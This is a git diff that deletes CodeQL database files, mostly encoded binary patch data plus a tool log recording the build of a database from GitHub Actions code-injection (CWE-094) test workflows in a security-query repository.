zq7j`K#3DYii9=lCk(5OwBRMHZNh(s4hU}yz9qGwN1~QU~tYjt&Imk&a7LuDhDP6_5yl1h}KG-W7DIm%Okid3crRj5ies#AlS)S@Q=bMj zq!CSMN;8_%l76(JHEn21JKEEMj&!0kUFbMaZYfW>zv^%=Qz&= zE^>*>T;VF$_>UWW>6Q1&n=X~J>FL}jl-td-pyypWS`NU^_ z@RMJjV|4w^AO0E#5QxA8At=Ex5j+I{5Ry=YCK_RgN?5`Xo(M!F5|N2QY&sB!xWpqq z2}npHQj?e@BqbTiNkK|dk%qLSqdn=#Kt|e;iOggnCt1lxc5;x5+~grI`N&TJ+ES2W z6rwOiC`xh4P=b<_qBLcxL^;Y+fr?b7234p^HL6pSdeoveb*M{y+R%W8G@>z0Xi76$ z)0`Hxq!pb40z!n)&UB$G-RMpadNPAv^rjDk=}SNQGl&5UWC%kU##n|kf{~126r&l( zcqTBNiA-Y>lbOO)W-^P}))`#qFqe7kVLl63$Rhq_F-usUGDRMhrHtvk9opVp7ER)yyYdYc+DH$^MQ}qTGXZKdm=FfAO0? z{IxAOr3rx@{s~DaLKB9tlp-AAi9ksr5{bw}Au7>`P6=WVmzcyNHgSkYV&ap4gd`#f zDM?B)l9Pf|q$f3LNJ~00kd=&NA~RXYMsBi`gPi0d4+Y6fKJrt5LKLSkMJP%!$}*2~ zl&1m}sYGR}Fqf)SqdIe_K}~8=n>y5`9Kg?&EF0KiD~BC_)p4u!JK#5r|7fA`zJ=L?s&0i9t+a5t}%~Cj|*eNFoxGgrp=RIVs6R zDpHe%w4@_F8OTTu){&E3*>T;VF$_>b${;3l_t&TZ~+mwVjj z0S|e^W1jGoXS}qI0DZ-4-td-pyypX7`N$_e^M!AG=LbLe#c%%b*Es_biNFLQD8UF$ z2>u}~A+dl^p$S7c!V`grL?s&0Nkh{PlzDalAna?+53l%ygx znHWfBvXGSmWFtE{$WKmkk(+$vAuk0fL}3O{grXFqKgB6QNlHcH1rVe$fM+2JDkVZ773C(Ctb6U`nRRR9Ee0p|b! diff --git a/db/db-yaml/default/yaml_scalars.rel b/db/db-yaml/default/yaml_scalars.rel deleted file mode 100644 index aa10fbd1a3ab8b089f766b6e623ff699b1dc88ff..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12540 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 Initializing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. -[2024-03-01 13:05:58] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:58] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson -[2024-03-01 13:05:58] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/.codeqlmanifest.json -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby/codeql-extractor.yml. -[2024-03-01 13:05:58] Plumbing command codeql resolve languages completed: - { - "aliases" : { - "c" : "cpp", - "c++" : "cpp", - "c-c++" : "cpp", - "c-cpp" : "cpp", - "c#" : "csharp", - "java-kotlin" : "java", - "kotlin" : "java", - "javascript-typescript" : "javascript", - "typescript" : "javascript" - }, - "extractors" : { - "go" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go" - } - ], - "python" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python", - "extractor_options" : { - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Python extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - }, - "python_executable_name" : { - "title" : "Controls the name of the Python executable used by the Python extractor.", - "description" : "The Python extractor uses platform-dependent heuristics to determine the name of the Python executable to use. Specifying a value for this option overrides the name of the Python executable used by the extractor. Accepted values are py, python and python3. Use this setting with caution, the Python extractor requires Python 3 to run.\n", - "type" : "string", - "pattern" : "^(py|python|python3)$" - } - } - } - ], - "java" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java", - "extractor_options" : { - "exclude" : { - "title" : "A glob excluding files from analysis.", - "description" : "A glob indicating what files to exclude from the analysis.\n", - "type" : "string" - }, - "add_prefer_source" : { - "title" : "Whether to always prefer source files over class files.", - "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction (experimental).", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "html" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html" - } - ], - "xml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml" - } - ], - "properties" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties" - } - ], - "cpp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp", - "extractor_options" : { } - } - ], - "swift" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift" - } - ], - "csv" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv" - } - ], - "yaml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the extractor. The supported levels are (in order of increasing verbosity):\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-03-01 13:05:58] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 -[2024-03-01 13:05:58] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. -[2024-03-01 13:05:58] [DETAILS] database init> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-03-01 13:05:58] [PROGRESS] database init> Calculated baseline information for languages: (71ms). -[2024-03-01 13:05:58] [PROGRESS] database init> Resolving extractor yaml. -[2024-03-01 13:05:58] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. -[2024-03-01 13:05:58] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. -[2024-03-01 13:05:58] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. This in-progress database is ready to be populated by an extractor. -[2024-03-01 13:05:58] Plumbing command codeql database init completed. -[2024-03-01 13:05:58] [PROGRESS] database create> Running build command: [] -[2024-03-01 13:05:58] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --index-traceless-dbs --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:58] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh. -[2024-03-01 13:05:58] [PROGRESS] database trace-command> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh] -[2024-03-01 13:05:59] [build-stderr] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] [build-stderr] /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... -[2024-03-01 13:05:59] [build-stderr] Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] -[2024-03-01 13:05:59] Plumbing command codeql database trace-command completed. -[2024-03-01 13:05:59] [PROGRESS] database create> Finalizing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. -[2024-03-01 13:05:59] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:59] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db... -[2024-03-01 13:05:59] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/yaml.dbscheme -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml -[2024-03-01 13:05:59] Clearing disk cache since the version file /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache/version does not exist -[2024-03-01 13:05:59] Tuple pool not found. Clearing relations with cached strings -[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode clear. -[2024-03-01 13:05:59] Sequence stamp origin is -6212520902965462594 -[2024-03-01 13:05:59] Pausing evaluation to hard-clear memory at sequence stamp o+0 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Pausing evaluation to quickly trim disk at sequence stamp o+1 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+2 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Trimming completed (6ms): Purged everything. -[2024-03-01 13:05:59] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml -[2024-03-01 13:05:59] Found 27 TRAP files (71.04 KiB) -[2024-03-01 13:05:59] [PROGRESS] dataset import> Importing TRAP files -[2024-03-01 13:05:59] Importing argus_case_study.yml.trap.gz (1 of 27) -[2024-03-01 13:05:59] Importing changed-files.yml.trap.gz (2 of 27) -[2024-03-01 13:05:59] Importing comment_issue.yml.trap.gz (3 of 27) -[2024-03-01 13:05:59] Importing comment_issue_newline.yml.trap.gz (4 of 27) -[2024-03-01 13:05:59] Importing cross1.yml.trap.gz (5 of 27) -[2024-03-01 13:05:59] Importing cross2.yml.trap.gz (6 of 27) -[2024-03-01 13:05:59] Importing cross3.yml.trap.gz (7 of 27) -[2024-03-01 13:05:59] Importing discussion.yml.trap.gz (8 of 27) -[2024-03-01 13:05:59] Importing discussion_comment.yml.trap.gz (9 of 27) -[2024-03-01 13:05:59] Importing gollum.yml.trap.gz (10 of 27) -[2024-03-01 13:05:59] Importing image_link_generator.yml.trap.gz (11 of 27) -[2024-03-01 13:05:59] Importing inter-job.yml.trap.gz (12 of 27) -[2024-03-01 13:05:59] Importing issues.yaml.trap.gz (13 of 27) -[2024-03-01 13:05:59] Importing matrix.yml.trap.gz (14 of 27) -[2024-03-01 13:05:59] Importing no-flow1.yml.trap.gz (15 of 27) -[2024-03-01 13:05:59] Importing no-flow2.yml.trap.gz (16 of 27) -[2024-03-01 13:05:59] Importing pull_request_review.yml.trap.gz (17 of 27) -[2024-03-01 13:05:59] Importing pull_request_review_comment.yml.trap.gz (18 of 27) -[2024-03-01 13:05:59] Importing pull_request_target.yml.trap.gz (19 of 27) -[2024-03-01 13:05:59] Importing push.yml.trap.gz (20 of 27) -[2024-03-01 13:05:59] Importing simple1.yml.trap.gz (21 of 27) -[2024-03-01 13:05:59] Importing simple2.yml.trap.gz (22 of 27) -[2024-03-01 13:05:59] Importing test.yml.trap.gz (23 of 27) -[2024-03-01 13:05:59] Importing workflow_run.yml.trap.gz (24 of 27) -[2024-03-01 13:05:59] Importing action.yml.trap.gz (25 of 27) -[2024-03-01 13:05:59] Importing action.yml.trap.gz (26 of 27) -[2024-03-01 13:05:59] Importing sourceLocationPrefix.trap.gz (27 of 27) -[2024-03-01 13:05:59] [PROGRESS] dataset import> Merging relations -[2024-03-01 13:05:59] Merging 1 fragment for 'files'. -[2024-03-01 13:05:59] Merged 208 bytes for 'files'. -[2024-03-01 13:05:59] Merging 1 fragment for 'folders'. -[2024-03-01 13:05:59] Merged 128 bytes for 'folders'. -[2024-03-01 13:05:59] Merging 1 fragment for 'containerparent'. -[2024-03-01 13:05:59] Merged 328 bytes for 'containerparent'. -[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_scalars'. -[2024-03-01 13:05:59] Merged 12540 bytes (12.25 KiB) for 'yaml_scalars'. -[2024-03-01 13:05:59] Merging 1 fragment for 'yaml'. -[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'yaml'. -[2024-03-01 13:05:59] Merging 1 fragment for 'locations_default'. -[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'locations_default'. -[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_locations'. -[2024-03-01 13:05:59] Merged 11128 bytes (10.87 KiB) for 'yaml_locations'. -[2024-03-01 13:05:59] Merging 1 fragment for 'sourceLocationPrefix'. -[2024-03-01 13:05:59] Merged 4 bytes for 'sourceLocationPrefix'. -[2024-03-01 13:05:59] Saving string and id pools to disk. -[2024-03-01 13:05:59] Finished importing TRAP files. -[2024-03-01 13:05:59] Read 360.45 KiB of uncompressed TRAP data. -[2024-03-01 13:05:59] Relation data size: 88.97 KiB (merge rate: 1.39 MiB/s) -[2024-03-01 13:05:59] String pool size: 2.06 MiB -[2024-03-01 13:05:59] ID pool size: 1.08 MiB -[2024-03-01 13:05:59] [PROGRESS] dataset import> Finished writing database (relations: 88.97 KiB; string pool: 2.06 MiB). -[2024-03-01 13:05:59] Pausing evaluation to close the cache at sequence stamp o+3 -[2024-03-01 13:05:59] The disk cache is freshly trimmed; leave it be. -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Plumbing command codeql dataset import completed. -[2024-03-01 13:05:59] [PROGRESS] database finalize> TRAP import complete (560ms). -[2024-03-01 13:05:59] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... -[2024-03-01 13:05:59] [PROGRESS] database cleanup> TRAP files cleaned up (13ms). -[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up scratch directory... -[2024-03-01 13:05:59] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). -[2024-03-01 13:05:59] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml -[2024-03-01 13:05:59] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml. -[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode trim. -[2024-03-01 13:05:59] Sequence stamp origin is -6212520900610201313 -[2024-03-01 13:05:59] Pausing evaluation to quickly trim memory at sequence stamp o+0 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+1 -[2024-03-01 13:05:59] Unpausing evaluation -[2024-03-01 13:06:00] Trimming completed (3ms): Trimmed disposable data from cache. -[2024-03-01 13:06:00] Pausing evaluation to close the cache at sequence stamp o+2 -[2024-03-01 13:06:00] The disk cache is freshly trimmed; leave it be. -[2024-03-01 13:06:00] Unpausing evaluation -[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. -[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml -[2024-03-01 13:06:00] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml (3ms). -[2024-03-01 13:06:00] 